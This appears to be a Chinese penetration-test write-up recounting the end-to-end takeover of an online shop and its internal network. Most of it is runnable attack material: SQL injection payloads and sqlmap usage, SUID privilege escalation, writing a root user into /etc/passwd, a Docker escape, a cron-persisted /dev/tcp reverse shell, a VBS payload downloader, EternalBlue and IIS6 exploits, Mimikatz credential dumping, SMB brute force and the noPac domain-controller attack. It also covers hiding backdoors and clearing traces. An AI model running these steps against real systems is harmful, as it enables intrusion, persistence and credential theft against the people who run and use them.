文章目录
前端渗透
目录读取漏洞
获取域名,使用dirsearch、御剑、进行目录扫描,发现存在robots.txt
访问robots.txt中屏蔽的目录发现存在目录读取漏洞
读取/admin获得后台管理系统地址
http://xxx.xxx.xxx/admin/webadmin.php?mod=do&act=login
在该商城注册一个账号并登录
13377779999 tiancai 123456
进入个人主页,发现一处头像上传,进行测试,不存在文件上传漏洞
测试各处搜索框,均未发现注入漏洞,此时我喝了一杯水,仔细思考
代码审计
按下F12,打开控制台,查看网站文件结构,在其中一个js文件中发现这是一个商城模板,大喜
在网络上成功找到源码,下载开始审计代码
漫长的时间后,不负众望;
SQL注入漏洞
第一个
虽然该项目在执行数据库操作时都会调用一个gpc的函数,但在修改密码处,发送验证码的时候,会记录用户的IP,并写入数据库,此处没有调用gpc函数,存在SQL注入漏洞
该漏洞整个流程是,网站找回密码处->输入账号和验证码->触发SQL注入
payload:
X-Forwarded-For: 111'AND (SELECT 1128 FROM (SELECT(select(sleep(4))))abc)-- aaaaa
第二个
该商城存在手机端页面,在查看订单时,传入 $_REQUEST[‘order_id’] 这里并没有过滤,存在SQL注入
利用火狐浏览器下载 User-Agent Switcher 设置手机模式,登录抓取包使用sqlmap 对其进行注入
随后使用sqlmap成功跑出数据库,获得后台登陆密码
payload:
sqlmap -r sql.txt --dbms mysql --dbs
GET /user.php?mod=back&act=dohuishou&order_id=1 HTTP/1.1
Host: xxx.xxx.xxx.xxx
User-Agent: Mozilla/5.0 (Android 11; Mobile; rv:83.0) Gecko/83.0 Firefox/83.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;
q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cookie: PHPSESSID=xxxxxxxxxxxxxxxxxx
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
但此时我却没有很开心,因为还是没有getshell,没法子,先登录后台进去看看
后续略,最后成功getshell,获得网站服务器普通权限
后端渗透
权限提升
随后我在隐藏处写入shell,把之前留下的后门文件清除,清楚痕迹
蚁剑连接后使用shell,发现其是一个docker容器
判断是不是在docker容器内
ls -alh /.dockerenv
进行提权操作,使用suid提权
find / -perm -u=s -type f 2>/dev/null
使用find
touch test
find test -exec whoami \;
获得root权限,上传msf后门,使用root权限运行,成功上线msf
chmod +x r
find test -exec ./exp \;
msf中为root权限,使用shell,创建root用户,并写入/etc/passwd
openssl passwd -1 -salt qwer 123456
创建交互shell,切换刚刚创建的root用户
python -c 'import pty; pty.spawn("/bin/bash")'
su qwer
Password: 123456
docker逃逸
目前还是处于docker容器内,所以还要进行提权到宿主上
在docker启动时,如果--privileged=true
,则可以逃逸
创建目录
mkdir /test
将宿主的目录挂载到test目录
mount /dev/sda1 /test
改变根目录为 /test
chroot /test
权限维持
创建反弹shell,写入计划任务
echo '/bin/bash -i >& bash -i >&/dev/tcp/xxx.xxx.xxx.xxx/8888 0>&1' > /root/sec.sh
echo '*/1 * * * * root bash /root/sec.sh' >>/etc/crontab
随后监听8888端口,获得反弹shell
nc -lvnp 8888
然后下载准备好的msf后门,msf重新启用handler监听,使宿主msf后门上线
wget http://xxx.xxx/exp
此时,获得该网站整个后端服务器权限
内网横向渗透
首先要进行信息收集,特别是ip和端口、主机网络连接等
查看ipconfig,获得内网ip,添加路由
run get_local_subnets
run autoroute -s 192.168.1.0/255.255.255.0
run autoroute -p
在msf中启动socket代理,并设置 kali 的 /etc/proxychains4.conf 文件
使用 proxychains4 调用nmap扫描内网
proxychains4 nmap -sT -Pn 192.168.1.0/24 -p 445,80
如何想要扫描获得的信息更加详细,可以使用fscan扫描内网
下载地址:https://github.com/shadow1ng/fscan
上传fscan后,进行扫描
./fscan_amd64 -h 192.168.1.0/24 -np -no -nopoc
最终扫描结果,另外存在两台主机,一台win7,一台win2003(存在IIS6.0),并且两台主机还存在于另一个网段
永恒之蓝
尝试使用永恒之蓝攻击win7
use windows/smb/ms17_010_eternalblue
set pyaload windows/meterpreter/bind_tcp #选择正向shell
set rhosts 192.168.1.13
run
攻击失败
CVE-2017-7269 iis6.0远程代码执行漏洞
尝试使用CVE-2017-7269攻击win2003
下载地址:https://github.com/g0rx/iis6-exploit-2017-CVE-2017-7269
proxychains4 python2 iis6webdav.py 192.168.1.14 80 vpsIP 接收端口
成功反弹shell,普通权限
msf生成win后门,成功上线
注意,windows server 2003 要使用特定的方式下载wenjian
vbs下载后门:
echo set a=createobject(^"adod^"+^"b.stream^"):set w=createobject(^"micro^"+^"soft.xmlhttp^"):w.open^"get^",wsh.arguments(0),0:w.send:a.type=1:a.open:a.write w.responsebody:a.savetofile wsh.arguments(1),2 >> downfile.vbs
cscript downfile.vbs http://xxx.xxx/1.exe.rar 1.exe
CVE-2009-1535 IIS6 2003提权
在msf上传CVE-2009-1535exp得到系统权限,再执行msf后门提权到系统权限,得到win2003主机
win2003主机信息收集
使用msf中的kiwi模块获取凭证,hashdump得到administrator的MD5加密密码
使用在线破解MD5网站 www.cmd5.com 破解得到明文密码 admin123
上传nbtscan,进行扫描,得到域内主机信息
C:\aaa>nbtscan -r 10.10.10.0/24
nbtscan -r 10.10.10.0/24
10.10.10.0 Sendto failed: No error
Warning: -r option not supported under Windows. Running without it.
Doing NBT name scan for addresses from 10.10.10.0/24
IP address NetBIOS Name Server User MAC address
------------------------------------------------------------------------------
10.10.10.12 WIN2003 <server> <unknown> xxx
10.10.10.15 WIN7 <server> <unknown> xxx
10.10.10.160 AD01 <server> <unknown> xxx
10.10.10.161 AD02 <server> <unknown> xxx
smb用户批量爆破
把netbios name获得的主机名设置成用户列表,使用smb登录模块进行批量弱口令测试
use scanner/smb/smb_login
[+] 192.168.1.13:445 - 192.168.1.13:445 - Success: '.\WIN7:admin123'
psexec登录获取shell
使用 msf smb/psexec 失败
use exploit/windows/smb/psexec
使用 impacket smbsxec 失败
proxychains4 python smbexec.py WIN7:admin123@10.10.10.15
使用 ms17_010_psexec 成功
use windows/smb/ms17_010_psexec
set payload windows/meterpreter/bind_tcp
set rhosts 10.10.10.15
set smbuser win7
set smbpass admin123
run
成功获得shell,系统权限,拿下win7
win7主机信息收集
使用msf中的kiwi模块
load kiwi
kiwi_cmd sekurlsa::logonPasswords
发现该主机上的域普通用户,域名,账号以及其明文密码
CVE-2021-42278 and CVE-2021-42287 攻击域控
下载地址:https://github.com/Ridter/noPac
proxychains4 python noPac.py xxx.xxx/test:xxx -dc-ip 10.10.10.160 - dc-host AD01 -shell --impersonate administrator
proxychains4 noPac.py xxx.xxx/test:xxx -dc-ip 10.10.10.160 -dc-host AD01 --impersonate administrator -dump
拿下域控,得到所有主机权限
项目总结
- 要胆大心细,不要怕试错,错的越多,收获越大
- 实在没思路了不懂就问,就像今年雷总演讲说的那样,你问懂的人会解决%99的问题
- 要了解最新漏洞以及各种安全资讯,武器越多,底气越大